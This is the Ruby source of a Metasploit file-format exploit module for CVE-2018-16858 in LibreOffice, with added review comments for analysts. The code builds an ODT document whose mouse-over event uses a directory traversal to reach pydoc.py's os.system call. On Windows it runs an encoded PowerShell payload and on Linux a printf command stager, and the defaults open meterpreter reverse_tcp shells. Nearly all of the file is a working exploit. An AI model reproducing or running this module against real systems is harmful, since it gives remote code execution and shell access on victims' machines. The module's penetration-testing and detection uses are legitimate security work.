Path: blob/master/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format module for CVE-2018-16858 (LibreOffice macro code execution).
#
# What the code below does, as far as this file shows:
# * builds one command string (@cmd) for the selected target,
# * renders the ERB template data/exploits/CVE-2018-16858/librefile.erb with
#   that command, a relative script path and a random text body in scope,
# * hands the rendered document to file_create.
#
# Review notes for analysts reading a generated sample:
# * The script reference is the literal relative path set in #exploit; it
#   contains '../' segments and the directory name 'python-core-3.5.5', so
#   both are usable indicators when inspecting event bindings in a document.
# * The module description states the trigger is a mouse-over event; the
#   template itself is not part of this file, so the exact markup should be
#   confirmed against the template.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Powershell
  include Msf::Exploit::CmdStager

  # Registers module metadata, the two targets and the FILENAME option.
  #
  # @param info [Hash] metadata passed in by the framework, merged via update_info
  def initialize(info = {})
    # Target 0: Windows. Index order matters because #exploit dispatches on it.
    windows_target = [
      'Windows',
      {
        'Platform' => 'win',
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'Payload' => 'windows/meterpreter/reverse_tcp',
        'DefaultOptions' => { 'PrependMigrate' => true }
      }
    ]

    # Target 1: Linux, staged with the 'printf' command-stager flavor.
    linux_target = [
      'Linux',
      {
        'Platform' => 'linux',
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'Payload' => 'linux/x86/meterpreter/reverse_tcp',
        'DefaultOptions' => { 'PrependFork' => true },
        'CmdStagerFlavor' => 'printf',
      }
    ]

    super(update_info(info,
      'Name' => 'LibreOffice Macro Code Execution',
      'Description' => %q{
        LibreOffice comes bundled with sample macros written in Python and
        allows the ability to bind program events to them. A macro can be tied
        to a program event by including the script that contains the macro and
        the function name to be executed. Additionally, a directory traversal
        vulnerability exists in the component that references the Python script
        to be executed. This allows a program event to execute functions from Python
        scripts relative to the path of the samples macros folder. The pydoc.py script
        included with LibreOffice contains the tempfilepager function that passes
        arguments to os.system, allowing RCE.

        This module generates an ODT file with a mouse over event that
        when triggered, will execute arbitrary code.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Alex Inführ', # Vulnerability discovery and PoC
          'Shelby Pace'  # Metasploit Module
        ],
      'References' =>
        [
          [ 'CVE', '2018-16858' ],
          [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
        ],
      'Platform' => [ 'win', 'linux' ],
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'Targets' => [ windows_target, linux_target ],
      'DisclosureDate' => '2018-10-18',
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
      ]
    )
  end

  # Builds the Windows command string and stores it in @cmd.
  #
  # The command comes from cmd_psh_payload with the options below; the literal
  # ' && echo' is then appended in place.
  # NOTE(review): the reason for the suffix is not visible in this file;
  # presumably it absorbs whatever the template's call site appends after the
  # command. Confirm against the template.
  #
  # @return [String] the command string, also left in @cmd
  def gen_windows_cmd
    psh_opts = {
      remove_comspec: true,
      method: 'reflection',
      encode_final_payload: true
    }

    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, psh_opts)
    @cmd << ' && echo'
  end

  # Builds the Linux command string and stores it in @cmd.
  #
  # Only the first element returned by generate_cmdstager is used; the same
  # ' && echo' suffix as in the Windows variant is appended.
  #
  # @return [String] the command string, also left in @cmd
  def gen_linux_cmd
    @cmd = generate_cmdstager.first
    @cmd << ' && echo'
  end

  # Renders the document template and returns the result as a string.
  #
  # The template is evaluated with this method's binding, so the local names
  # `path` and `text_content` (and the instance variable @cmd) are part of the
  # template's interface and must keep their names.
  # NOTE(review): which of these the template actually reads cannot be
  # confirmed from this file.
  #
  # @param path [String] relative script path made available to the template
  # @return [String] rendered document content
  def gen_file(path)
    # Random 10-15 letter string made available to the template.
    text_content = Rex::Text.rand_text_alpha(10..15)

    # file from Alex Inführ's PoC post referenced above
    template_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb')
    fodt_file = File.read(template_path)
    ERB.new(fodt_file).result(binding)
  rescue Errno::ENOENT
    # A missing template is reported through the framework's failure path.
    fail_with(Failure::NotFound, 'Cannot find template file')
  end

  # Entry point: picks the command builder by target index, renders the
  # document and passes it to file_create.
  #
  # Any TARGET value other than 0 or 1 aborts with Failure::BadConfig.
  def exploit
    # Relative script reference used by the rendered document. The traversal
    # segments and the bundled-Python directory name are fixed strings.
    pydoc_rel_path = '../../../program/python-core-3.5.5/lib/pydoc.py'

    case datastore['TARGET']
    when 0 then gen_windows_cmd
    when 1 then gen_linux_cmd
    else fail_with(Failure::BadConfig, 'A formal target was not chosen.')
    end

    file_create(gen_file(pydoc_rel_path))
  end
end